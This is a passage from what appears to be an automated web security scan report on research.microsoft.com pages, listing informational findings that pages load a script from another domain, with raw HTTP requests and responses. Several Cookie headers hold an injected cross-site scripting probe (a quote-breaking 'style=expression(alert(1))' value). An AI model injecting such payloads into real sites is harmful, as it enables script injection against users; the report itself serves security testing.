Cookie: MC1=GUID=f4593467ede44f6aaa7ee86821872394&HASH=f459&LV=20118&V=3; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; MS_WT=ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350164\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350164\\\",\\\"uid\\\":\\\"4824407653540645216\\\",\\\"userSession\\\":\\\"1314992019982-13149920199826988\\\"}\"}}","Expires":"\/Date(1322768021129)\/"}; mcI=Sat, 10 Sep 2011 01:57:49 GMT; A=I&I=AxUFAAAAAAALCQAAtHepBqhKdMJHRzuiM0jZ/g!!&GO=244&CS=117\Gi002j50206; WT_NVR_RU=0=msdn|technet:1=:2=; netreflector=1; _wt.user-311121=1027e544307e5d8b7f05c10e3b31d5d888fad471507d3a52761a2dde11c5f7a91489ba34c786403712645ac8b0e364da72498d40a091deec9e4f89eb126b6c656aafdc846839212b719c52abccb3c9c17421dc888a96dcf02a75b6eee126fd20e30801c4d9e9; _wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d018a822c; _opt_vi_7U7CE9V4=C47D4E76-7720-4371-B3BB-F8A565CEC250; WT_FPC=id=50.23.123.106-382843424.30173056:lv=1315007180799:ss=1315004267204; msdn=L=1033; Microsoft.com=SS=280&SS_Refn=150&SS_Url=http://social.msdn.microsoft.com/Search/en-US/?query=xss&rq=meta:Search.MSForums.ForumID(89a61008-0ec7-44d2-8e8e-f4298bd11382)+site:microsoft.com&rn=Announcements+for+all+Forums+Forum~~9/3/2011 2:45:57 AM; omniID=1314964195919_2acb_27e1_036d_ce34d5420c63; MSID=Microsoft.CreationDate=09/02/2011 11:43:32&Microsoft.LastVisitDate=09/03/2011 02:46:31&Microsoft.VisitStartDate=09/03/2011 01:57:14&Microsoft.CookieId=c79a9875-a200-46b5-bc88-db1c768a3311&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=57&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0666-6092-7684-7665; UserState=Returning=False&LastVisit=09/03/2011 02:47:11&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=7e494b87-8d62-4e5e-8051-b07cbe0c11e8&RegUser=; s_cc=true; s_sq=%5B%5BB%5D%5D; SH=27b6a"style="x :expression(alert(1)) "d048afd9275||xss txt css img help faq||faq help windows 7||xss.cx sqli httpi rxss||xss

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 12:56:30 GMT
Content-Length: 59520

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head id="ctl00_ctl00_HeadTag"><meta http-equiv="X-UA-Compatible"
...[SNIP]...
</script>
<script type="text/javascript" src="http://stj.msn.com/br/om/js/s_code.js"></script>
...[SNIP]...

18.14. http://research.microsoft.com/apps/dp/dl/downloads.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/apps/dp/dl/downloads.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /apps/dp/dl/downloads.aspx HTTP/1.1
Host: research.microsoft.com
Proxy-Connection: keep-alive
Referer: http://research.microsoft.com/apps/dp/pr/projects.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=f4593467ede44f6aaa7ee86821872394&HASH=f459&LV=20118&V=3; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; MS_WT=ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350164\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350164\\\",\\\"uid\\\":\\\"4824407653540645216\\\",\\\"userSession\\\":\\\"1314992019982-13149920199826988\\\"}\"}}","Expires":"\/Date(1322768021129)\/"}; mcI=Sat, 10 Sep 2011 01:57:49 GMT; A=I&I=AxUFAAAAAAALCQAAtHepBqhKdMJHRzuiM0jZ/g!!&GO=244&CS=117\Gi002j50206; WT_NVR_RU=0=msdn|technet:1=:2=; netreflector=1; _wt.user-311121=1027e544307e5d8b7f05c10e3b31d5d888fad471507d3a52761a2dde11c5f7a91489ba34c786403712645ac8b0e364da72498d40a091deec9e4f89eb126b6c656aafdc846839212b719c52abccb3c9c17421dc888a96dcf02a75b6eee126fd20e30801c4d9e9; _wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d018a822c; _opt_vi_7U7CE9V4=C47D4E76-7720-4371-B3BB-F8A565CEC250; WT_FPC=id=50.23.123.106-382843424.30173056:lv=1315007180799:ss=1315004267204; msdn=L=1033; Microsoft.com=SS=280&SS_Refn=150&SS_Url=http://social.msdn.microsoft.com/Search/en-US/?query=xss&rq=meta:Search.MSForums.ForumID(89a61008-0ec7-44d2-8e8e-f4298bd11382)+site:microsoft.com&rn=Announcements+for+all+Forums+Forum~~9/3/2011 2:45:57 AM; omniID=1314964195919_2acb_27e1_036d_ce34d5420c63; MSID=Microsoft.CreationDate=09/02/2011 11:43:32&Microsoft.LastVisitDate=09/03/2011 02:46:31&Microsoft.VisitStartDate=09/03/2011 01:57:14&Microsoft.CookieId=c79a9875-a200-46b5-bc88-db1c768a3311&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=57&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0666-6092-7684-7665; UserState=Returning=False&LastVisit=09/03/2011 02:47:11&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=7e494b87-8d62-4e5e-8051-b07cbe0c11e8&RegUser=; SH=xss||xss.cx sqli httpi dork ghdb bhdb||27b6a"style="x :expression(alert(1)) "d048afd9275||xss txt css img help faq||faq help windows 7; s_cc=true; s_sq=msnportalbetarmc%3D%2526pid%253DProjects%252520-%252520Microsoft%252520Research%2526pidt%253D1%2526oid%253Dhttp%25253A//research.microsoft.com/c/1045%2526ot%253DA

Response

18.15. http://research.microsoft.com/apps/dp/downloads.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/apps/dp/downloads.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /apps/dp/downloads.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:24:03 GMT
Connection: close
Content-Length: 59299

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head id="ctl00_ctl00_HeadTag"><meta http-equiv="X-UA-Compatible"
...[SNIP]...
</script>
<script type="text/javascript" src="http://stj.msn.com/br/om/js/s_code.js"></script>
...[SNIP]...

18.16. http://research.microsoft.com/apps/dp/ev/events.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/apps/dp/ev/events.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /apps/dp/ev/events.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.17. http://research.microsoft.com/apps/dp/gr/groups.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/apps/dp/gr/groups.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /apps/dp/gr/groups.aspx HTTP/1.1
Host: research.microsoft.com
Proxy-Connection: keep-alive
Referer: http://research.microsoft.com/apps/dp/vi/videos.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=f4593467ede44f6aaa7ee86821872394&HASH=f459&LV=20118&V=3; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; MS_WT=ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350164\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350164\\\",\\\"uid\\\":\\\"4824407653540645216\\\",\\\"userSession\\\":\\\"1314992019982-13149920199826988\\\"}\"}}","Expires":"\/Date(1322768021129)\/"}; mcI=Sat, 10 Sep 2011 01:57:49 GMT; A=I&I=AxUFAAAAAAALCQAAtHepBqhKdMJHRzuiM0jZ/g!!&GO=244&CS=117\Gi002j50206; WT_NVR_RU=0=msdn|technet:1=:2=; netreflector=1; _wt.user-311121=1027e544307e5d8b7f05c10e3b31d5d888fad471507d3a52761a2dde11c5f7a91489ba34c786403712645ac8b0e364da72498d40a091deec9e4f89eb126b6c656aafdc846839212b719c52abccb3c9c17421dc888a96dcf02a75b6eee126fd20e30801c4d9e9; _wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d018a822c; _opt_vi_7U7CE9V4=C47D4E76-7720-4371-B3BB-F8A565CEC250; WT_FPC=id=50.23.123.106-382843424.30173056:lv=1315007180799:ss=1315004267204; msdn=L=1033; Microsoft.com=SS=280&SS_Refn=150&SS_Url=http://social.msdn.microsoft.com/Search/en-US/?query=xss&rq=meta:Search.MSForums.ForumID(89a61008-0ec7-44d2-8e8e-f4298bd11382)+site:microsoft.com&rn=Announcements+for+all+Forums+Forum~~9/3/2011 2:45:57 AM; omniID=1314964195919_2acb_27e1_036d_ce34d5420c63; MSID=Microsoft.CreationDate=09/02/2011 11:43:32&Microsoft.LastVisitDate=09/03/2011 02:46:31&Microsoft.VisitStartDate=09/03/2011 01:57:14&Microsoft.CookieId=c79a9875-a200-46b5-bc88-db1c768a3311&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=57&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0666-6092-7684-7665; UserState=Returning=False&LastVisit=09/03/2011 02:47:11&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=7e494b87-8d62-4e5e-8051-b07cbe0c11e8&RegUser=; SH=xss||xss.cx sqli httpi dork ghdb bhdb||27b6a"style="x :expression(alert(1)) "d048afd9275||xss txt css img help faq||faq help windows 7; s_cc=true; s_sq=msnportalbetarmc%3D%2526pid%253DVideos%252520-%252520Microsoft%252520Research%2526pidt%253D1%2526oid%253Dhttp%25253A//research.microsoft.com/c/1013%2526ot%253DA

Response

18.18. http://research.microsoft.com/apps/dp/groups.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/apps/dp/groups.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /apps/dp/groups.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:24:03 GMT
Connection: close
Content-Length: 59299

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head id="ctl00_ctl00_HeadTag"><meta http-equiv="X-UA-Compatible"
...[SNIP]...
</script>
<script type="text/javascript" src="http://stj.msn.com/br/om/js/s_code.js"></script>
...[SNIP]...

18.19. http://research.microsoft.com/apps/dp/i/reverse_ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/apps/dp/i/reverse_

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /apps/dp/i/reverse_ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:24:01 GMT
Connection: close
Content-Length: 59299

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head id="ctl00_ctl00_HeadTag"><meta http-equiv="X-UA-Compatible"
...[SNIP]...
</script>
<script type="text/javascript" src="http://stj.msn.com/br/om/js/s_code.js"></script>
...[SNIP]...

18.20. http://research.microsoft.com/apps/dp/ne/news.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/apps/dp/ne/news.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /apps/dp/ne/news.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.21. http://research.microsoft.com/apps/dp/news.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/apps/dp/news.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /apps/dp/news.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:24:03 GMT
Connection: close
Content-Length: 59299

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head id="ctl00_ctl00_HeadTag"><meta http-equiv="X-UA-Compatible"
...[SNIP]...
</script>
<script type="text/javascript" src="http://stj.msn.com/br/om/js/s_code.js"></script>
...[SNIP]...

18.22. http://research.microsoft.com/apps/dp/pe/people.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/apps/dp/pe/people.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /apps/dp/pe/people.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.23. http://research.microsoft.com/apps/dp/pr/projects.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/apps/dp/pr/projects.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /apps/dp/pr/projects.aspx HTTP/1.1
Host: research.microsoft.com
Proxy-Connection: keep-alive
Referer: http://research.microsoft.com/apps/dp/search.aspx?q=xss&x=0&y=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=f4593467ede44f6aaa7ee86821872394&HASH=f459&LV=20118&V=3; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; MS_WT=ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350164\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350164\\\",\\\"uid\\\":\\\"4824407653540645216\\\",\\\"userSession\\\":\\\"1314992019982-13149920199826988\\\"}\"}}","Expires":"\/Date(1322768021129)\/"}; mcI=Sat, 10 Sep 2011 01:57:49 GMT; A=I&I=AxUFAAAAAAALCQAAtHepBqhKdMJHRzuiM0jZ/g!!&GO=244&CS=117\Gi002j50206; WT_NVR_RU=0=msdn|technet:1=:2=; netreflector=1; _wt.user-311121=1027e544307e5d8b7f05c10e3b31d5d888fad471507d3a52761a2dde11c5f7a91489ba34c786403712645ac8b0e364da72498d40a091deec9e4f89eb126b6c656aafdc846839212b719c52abccb3c9c17421dc888a96dcf02a75b6eee126fd20e30801c4d9e9; _wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d018a822c; _opt_vi_7U7CE9V4=C47D4E76-7720-4371-B3BB-F8A565CEC250; WT_FPC=id=50.23.123.106-382843424.30173056:lv=1315007180799:ss=1315004267204; msdn=L=1033; Microsoft.com=SS=280&SS_Refn=150&SS_Url=http://social.msdn.microsoft.com/Search/en-US/?query=xss&rq=meta:Search.MSForums.ForumID(89a61008-0ec7-44d2-8e8e-f4298bd11382)+site:microsoft.com&rn=Announcements+for+all+Forums+Forum~~9/3/2011 2:45:57 AM; omniID=1314964195919_2acb_27e1_036d_ce34d5420c63; MSID=Microsoft.CreationDate=09/02/2011 11:43:32&Microsoft.LastVisitDate=09/03/2011 02:46:31&Microsoft.VisitStartDate=09/03/2011 01:57:14&Microsoft.CookieId=c79a9875-a200-46b5-bc88-db1c768a3311&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=57&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0666-6092-7684-7665; UserState=Returning=False&LastVisit=09/03/2011 02:47:11&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=7e494b87-8d62-4e5e-8051-b07cbe0c11e8&RegUser=; SH=xss||xss.cx sqli httpi dork ghdb bhdb||27b6a"style="x :expression(alert(1)) "d048afd9275||xss txt css img help faq||faq help windows 7; s_cc=true; s_sq=msnportalbetarmc%3D%2526pid%253DMicrosoft%252520Research%252520Search%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A//research.microsoft.com/c/1042%2526ot%253DA

Response

18.24. http://research.microsoft.com/apps/dp/projects.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/apps/dp/projects.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /apps/dp/projects.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:24:03 GMT
Connection: close
Content-Length: 59299

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head id="ctl00_ctl00_HeadTag"><meta http-equiv="X-UA-Compatible"
...[SNIP]...
</script>
<script type="text/javascript" src="http://stj.msn.com/br/om/js/s_code.js"></script>
...[SNIP]...

18.25. http://research.microsoft.com/apps/dp/pu/publications.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/apps/dp/pu/publications.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /apps/dp/pu/publications.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.26. http://research.microsoft.com/apps/dp/search.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/apps/dp/search.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

Response

18.27. http://research.microsoft.com/apps/dp/vi/videos.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/apps/dp/vi/videos.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /apps/dp/vi/videos.aspx HTTP/1.1
Host: research.microsoft.com
Proxy-Connection: keep-alive
Referer: http://research.microsoft.com/apps/dp/dl/downloads.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=f4593467ede44f6aaa7ee86821872394&HASH=f459&LV=20118&V=3; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; MS_WT=ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350164\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350164\\\",\\\"uid\\\":\\\"4824407653540645216\\\",\\\"userSession\\\":\\\"1314992019982-13149920199826988\\\"}\"}}","Expires":"\/Date(1322768021129)\/"}; mcI=Sat, 10 Sep 2011 01:57:49 GMT; A=I&I=AxUFAAAAAAALCQAAtHepBqhKdMJHRzuiM0jZ/g!!&GO=244&CS=117\Gi002j50206; WT_NVR_RU=0=msdn|technet:1=:2=; netreflector=1; _wt.user-311121=1027e544307e5d8b7f05c10e3b31d5d888fad471507d3a52761a2dde11c5f7a91489ba34c786403712645ac8b0e364da72498d40a091deec9e4f89eb126b6c656aafdc846839212b719c52abccb3c9c17421dc888a96dcf02a75b6eee126fd20e30801c4d9e9; _wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d018a822c; _opt_vi_7U7CE9V4=C47D4E76-7720-4371-B3BB-F8A565CEC250; WT_FPC=id=50.23.123.106-382843424.30173056:lv=1315007180799:ss=1315004267204; msdn=L=1033; Microsoft.com=SS=280&SS_Refn=150&SS_Url=http://social.msdn.microsoft.com/Search/en-US/?query=xss&rq=meta:Search.MSForums.ForumID(89a61008-0ec7-44d2-8e8e-f4298bd11382)+site:microsoft.com&rn=Announcements+for+all+Forums+Forum~~9/3/2011 2:45:57 AM; omniID=1314964195919_2acb_27e1_036d_ce34d5420c63; MSID=Microsoft.CreationDate=09/02/2011 11:43:32&Microsoft.LastVisitDate=09/03/2011 02:46:31&Microsoft.VisitStartDate=09/03/2011 01:57:14&Microsoft.CookieId=c79a9875-a200-46b5-bc88-db1c768a3311&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=57&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0666-6092-7684-7665; UserState=Returning=False&LastVisit=09/03/2011 02:47:11&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=7e494b87-8d62-4e5e-8051-b07cbe0c11e8&RegUser=; SH=xss||xss.cx sqli httpi dork ghdb bhdb||27b6a"style="x :expression(alert(1)) "d048afd9275||xss txt css img help faq||faq help windows 7; s_cc=true; s_sq=msnportalbetarmc%3D%2526pid%253DDownloads%252520-%252520Microsoft%252520Research%2526pidt%253D1%2526oid%253Dhttp%25253A//research.microsoft.com/c/1048%2526ot%253DA

Response

18.28. http://research.microsoft.com/apps/pubs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/apps/pubs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /apps/pubs/default.aspx?id=136976 HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.29. http://research.microsoft.com/apps/search/videosearch.ashx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/apps/search/videosearch.ashx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /apps/search/videosearch.ashx? HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 12:57:57 GMT
Connection: close
Content-Length: 59299

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head id="ctl00_ctl00_HeadTag"><meta http-equiv="X-UA-Compatible"
...[SNIP]...
</script>
<script type="text/javascript" src="http://stj.msn.com/br/om/js/s_code.js"></script>
...[SNIP]...

18.30. http://research.microsoft.com/apps/video/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/apps/video/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /apps/video/default.aspx?id=103780 HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.31. http://research.microsoft.com/en-us/about/awards.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/about/awards.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

Response

18.32. http://research.microsoft.com/en-us/about/brochure-1.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/about/brochure-1.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/about/brochure-1.aspx HTTP/1.1
Host: research.microsoft.com
Proxy-Connection: keep-alive
Referer: http://research.microsoft.com/en-us/research/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
